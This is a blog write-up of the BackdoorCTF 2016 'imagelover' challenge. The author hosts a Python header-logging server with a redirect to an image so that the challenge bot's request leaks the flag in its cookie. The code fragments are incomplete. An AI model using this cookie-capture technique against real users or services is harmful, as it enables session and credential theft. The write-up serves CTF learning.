BackdoorCTF 2016 - imagelover | Akash Trehan

BackdoorCTF 2016 - imagelover

Backdoor Logo

BackdoorCTF is the annual flagship CTF competition conducted by SDSLabs and InfoSecIITR.

Points: 70


Find imagelover here


The challenge was updated. Scroll down to see the updates solution

When I went to the specified website it said:

Imagelover loves viewing pictures of people. He has opened this website so that you can share your pics with him. Imagelover visits the image with his flag as a sign of gratitude.

There was a URL box to add our link to photos. So it said “Imagelover visits the image with his flag”. The only way to do this would be to send a GET request to the website we enter and send the flag in the Headers. So I googled and found this script to print the Headers of anyone who sends a GET request to my VPS.

import SimpleHTTPServer
import SocketServer
import logging

PORT = 8000

class ServerHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):

    def do_GET(self):

Handler = ServerHandler

httpd = SocketServer.TCPServer(("", PORT), Handler)

print "serving at port", PORT


So now they don’t give us the flag until we return them a png, jpg or a gif. So I decided to redirect them to an image. For this I made some chanegs in the do_GET() method. Here is the updated method.

   def do_GET(self):
        self.send_response(301) # For a redirect we need to send a `301` response rather than `200`
        self.send_header('Location','') # Add a link to an image in place of ``


Basically I hosted my VPS with the script above and entered the URL in place of a photograph URL. Imagelover would visit it and I would get the flag from the Headers.

And as expeced as soon as I submitted my URL I got a GET request with the flag in the cookie.

Go through other writeups for more such fun challenges.

Follow @CodeMaxx
BackdoorCTF 2016 - isolve
Akash Trehan

Akash Trehan


comments powered by Disqus
rss facebook twitter github youtube mail spotify instagram linkedin google pinterest medium